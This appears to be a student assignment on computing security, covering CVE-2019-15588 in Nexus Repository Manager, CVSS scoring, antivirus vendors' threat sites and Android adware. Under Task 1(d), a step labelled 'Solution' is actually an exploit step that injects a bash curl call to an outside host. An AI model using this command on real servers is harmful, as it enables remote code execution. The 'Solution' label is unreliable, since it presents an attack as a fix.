Security in Computing and IT Assignment 1: Analysis and Solutions

Verified

Added on 2022/09/02

AI Summary

This assignment delves into the realm of security in computing and IT, encompassing a detailed analysis of vulnerabilities, mitigation strategies, and real-world examples. Task 1 focuses on a recent vulnerability from the National Vulnerability Database (NVD), providing a description, impact assessment using CVSS scores (both version 2 and 3), and proposed solutions. The assignment also explores strategies to mitigate cyber security incidents, referencing the ASD's guidelines. Task 2 investigates various antivirus companies' websites, evaluating their risk criteria and vulnerability reporting. Task 3 examines mobile threats, specifically adware, and their global impact. Task 4 addresses email security, outlining potential hacking methods and recommended countermeasures. Finally, Task 5 discusses the Intel Management Engine and its security implications, including mitigation strategies. The assignment demonstrates a comprehensive understanding of security concepts and practical application of knowledge.

Running head: Security in Computing and IT
Security in Computing and IT
Name of the Student
Name of the University
Author Note

Paraphrase This Document

Need a fresh take? Get an instant paraphrase of this document with our AI Paraphraser

Security in Computing and IT 1
Table of Contents
Task 1:........................................................................................................................................2
Task 2:........................................................................................................................................6
Task 3:......................................................................................................................................11
Task 4:......................................................................................................................................13
Three ways of email account can be hacked:.......................................................................14
The things to do at the time email gets hacked:...................................................................14
Change the passcode:.......................................................................................................14
Check the setting:.............................................................................................................14
Scan your computer:........................................................................................................14
Tools:....................................................................................................................................15
Avanan Cloud Security Platform:....................................................................................15
SpamTitan:.......................................................................................................................15
Task 5:......................................................................................................................................15
Intel Management Engine:...................................................................................................15
AMD equivalent:..................................................................................................................15
Security concern:..................................................................................................................16
Intel’s responsibility:............................................................................................................16
Response of computer vendors:...........................................................................................16
Article:..................................................................................................................................17
Bibliography:............................................................................................................................18

2Security in Computing and IT
Task 1:
a)
Link: https://nvd.nist.gov/vuln/detail/CVE-2019-15588#vulnCurrentDescriptionTitle
There is an OS command Injection that is existed in the Nexus Repository Manager 2.14.14
(bypass CVE-2019-5475) which might allow a hacker RCE (Remote Code Execution). All of
the instances including the CommandLineExecutor.java with the capability of Yum
Configuration.
b)
CVSS Score version 2: 9.0 HIGH

3Security in Computing and IT
Vector: (AV:N/AC:L/Au:S/C:C/I:C/A:C)
Complexity: Low
Impact sub-score: 10.0
Confidentiality: Complete
CVSS Score version 3:
Score: 7.2 HIGH

Paraphrase This Document

Need a fresh take? Get an instant paraphrase of this document with our AI Paraphraser

4Security in Computing and IT
Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Complexity: Low
Impact score: 5.9
Confidentiality: High
c)
Mitigation strategies:
Application whitelisting: This strategy is useful for preventing execution of the
malicious and unapproved programs that includes .exe, DLL, scripts.

5Security in Computing and IT
Patch applications: The applications need to be patched, the users have to use the
applications in their latest version.
Purpose of using CVSS scores:
The CVSS attempts for assigning severity scores to the vulnerabilities that provide
allowance to the responders for prioritizing the resources and responses in accord with the
threats. The scores can be calculated on the basis of a formula that is having dependency on
various matrices. The CVSS scores are used to determine temporal, severity as well as
environmental scores that are exist too. The present version of CVSS is CVSSv3.1 which was
released in June, 2019.
d)
Solution:
1. Navigate to the capabilities in the Nexus repository manager.
2. Create or edit a new Yum: capability of configuration.
3. Set path of "createrepo" or "mergerepo" to an OS command (/bin / bash -c curl $
{IFS} http:// 192.168.88.1:8000 // createrepo).

6Security in Computing and IT
e)
Task 2:
a)
McAfee: https://www.mcafee.com/enterprise/en-us/threat-center.html#
Kaspersky: https://threats.kaspersky.com/
AVG: https://www.avg.com/en-in/about-viruses
Bit defender: https://threatmap.bitdefender.com/
b)
Anti-virus Risk criteria Date Recommendatio Description

Paraphrase This Document

Need a fresh take? Get an instant paraphrase of this document with our AI Paraphraser

7Security in Computing and IT
n
McAfee The website
has described
the risk criteria
very well as
one can easily.
There is a
threat centre
included in the
site.
The dates are
mentioned in
the site such as
when the
threats were
determined.
The website
should provide
mitigation
techniques for
current
vulnerabilities.
The developers
needed to manage
the options such a
way that someone
can access all the
information
easily.
The users can
learn about top
quality cyber
security threats
in the threat
landscape
dashboard.
Kaspersky The risks are
described very
well in the site.
There is a
threat centre
included in the
site
The dates are
mentioned in
the site such as
when the
threats were
determined.
The developers
need to add bullet
points that all the
information can
be found easily.
The Kaspersky
is an antivirus
software that
provide security
to the sites,
personal PCs.
AVG One can easily
find the
mitigation plan
for a threat.
The dates are
mentioned in
the site such as
when the
The developers
needed to manage
the options such a
way that someone
Devices, data,
offices can be
remain safe by
the antivirus.

8Security in Computing and IT
threats were
determined.
can access all the
information
easily
Bit defender There is a
threat centre
included in the
site. The risks
are described
very well in the
site.
The dates are
mentioned in
the site such as
when the
threats were
determined.
The interface of
the website need
to improve as all
the information
are hazy.
The antivirus
provide internet
security to the
sites

9Security in Computing and IT

Paraphrase This Document

Need a fresh take? Get an instant paraphrase of this document with our AI Paraphraser

10Security in Computing and IT
c)
The vulnerabilities and threats are listed in the websites. However, the threats cannot
be found easily from the websites as the things are very hazy to find from the sites. For
comparing the threats, one has to compare the threats manually, the user need to take one
vulnerability from the sites respectively and the user has to compare them manually.
d)
The threats are listed in all of the sites but the ways are different for each sites. As to
compare the threats, one has to compare the threats manually, the user need to take one
vulnerability from the sites respectively and the user has to compare them manually.
For analysing the threats Kaspersky is the best as all the threats are listed well in the
site. Screenshot attached below.

11Security in Computing and IT
Task 3:
a)
Threat 1: https://threats.kaspersky.com/en/threat/Adware.AndroidOS.Dilidi/
These applications try to obtain super user rights on a device and periodically connect to a
server in order to download and stealthily install other applications. In addition, they monitor
all applications installed on the device and send information about them to a server.